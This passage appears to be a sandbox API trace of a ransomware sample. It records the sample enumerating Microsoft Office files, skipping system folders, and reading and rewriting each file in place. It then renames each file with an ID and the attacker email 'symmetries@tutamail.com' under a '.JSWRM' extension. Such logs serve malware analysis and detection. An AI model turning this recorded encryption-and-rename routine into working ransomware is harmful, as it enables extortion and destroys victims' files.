[0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="msocache") returned 1 [0122.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0122.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0122.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_K_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_K_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0122.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0122.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.393] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0122.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.394] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0122.394] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.394] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0122.394] ReadFile (in: hFile=0x238, lpBuffer=0x209710, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.395] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.395] WriteFile (in: hFile=0x238, lpBuffer=0x209710*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0122.395] CloseHandle (hObject=0x238) returned 1 [0122.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0122.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0122.395] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0122.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0122.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0122.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0122.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.396] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0122.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0122.396] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0122.397] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b8506c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3b8506c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x482f84d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x215ae, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_PRM.HXS", cAlternateFileName="VISIO_~2.HXS")) returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2=".") returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="..") returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="...") returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="windows") returned -1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="recovery") returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="perflogs") returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="documents and settings") returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="$RECYCLE.BIN") returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="system volume information") returned 1 [0122.397] lstrcmpiW (lpString1="VISIO_PRM.HXS", lpString2="msocache") returned 1 [0122.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0122.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM.HXS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM.HXS", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM.HXS", lpUsedDefaultChar=0x0) returned 13 [0122.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0122.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM.HXS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM.HXS", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM.HXS", lpUsedDefaultChar=0x0) returned 13 [0122.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0122.397] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.397] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.397] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.397] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.398] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=136622) returned 1 [0122.398] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.398] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x215a0) returned 0x24e1d8 [0122.398] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x215a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x215a0, lpOverlapped=0x0) returned 1 [0122.408] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.408] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x215a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x215a0, lpOverlapped=0x0) returned 1 [0122.408] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.409] CloseHandle (hObject=0x238) returned 1 [0122.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0122.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0122.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0122.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0122.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0122.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0122.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.411] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x482f84d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x482f84d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x482f84d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x28b, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_PRM_COL.HXC", cAlternateFileName="VISIO_~2.HXC")) returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2=".") returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="..") returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="...") returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="windows") returned -1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="recovery") returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="perflogs") returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="documents and settings") returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="system volume information") returned 1 [0122.411] lstrcmpiW (lpString1="VISIO_PRM_COL.HXC", lpString2="msocache") returned 1 [0122.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_COL.HXC", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0122.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_COL.HXC", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM_COL.HXC", lpUsedDefaultChar=0x0) returned 17 [0122.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_COL.HXC", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0122.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_COL.HXC", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM_COL.HXC", lpUsedDefaultChar=0x0) returned 17 [0122.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0122.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0122.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.412] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=651) returned 1 [0122.412] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.412] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x20b1f8 [0122.412] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x280, lpOverlapped=0x0) returned 1 [0122.413] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.413] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x280, lpOverlapped=0x0) returned 1 [0122.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0122.413] CloseHandle (hObject=0x238) returned 1 [0122.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0122.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0122.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0122.414] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0122.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0122.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0122.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0122.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.414] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_PRM_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_prm_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0122.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0122.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0122.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0122.415] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x482f84d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x482f84d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x482f84d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xd1, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_PRM_COL.HXT", cAlternateFileName="VISIO_~2.HXT")) returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2=".") returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="..") returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="...") returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="windows") returned -1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="recovery") returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="perflogs") returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="documents and settings") returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="system volume information") returned 1 [0122.415] lstrcmpiW (lpString1="VISIO_PRM_COL.HXT", lpString2="msocache") returned 1 [0122.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_COL.HXT", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_PRM_COL.HXT", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_PRM_COL.HXT", lpUsedDefaultChar=0x0) returned 17 [0122.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 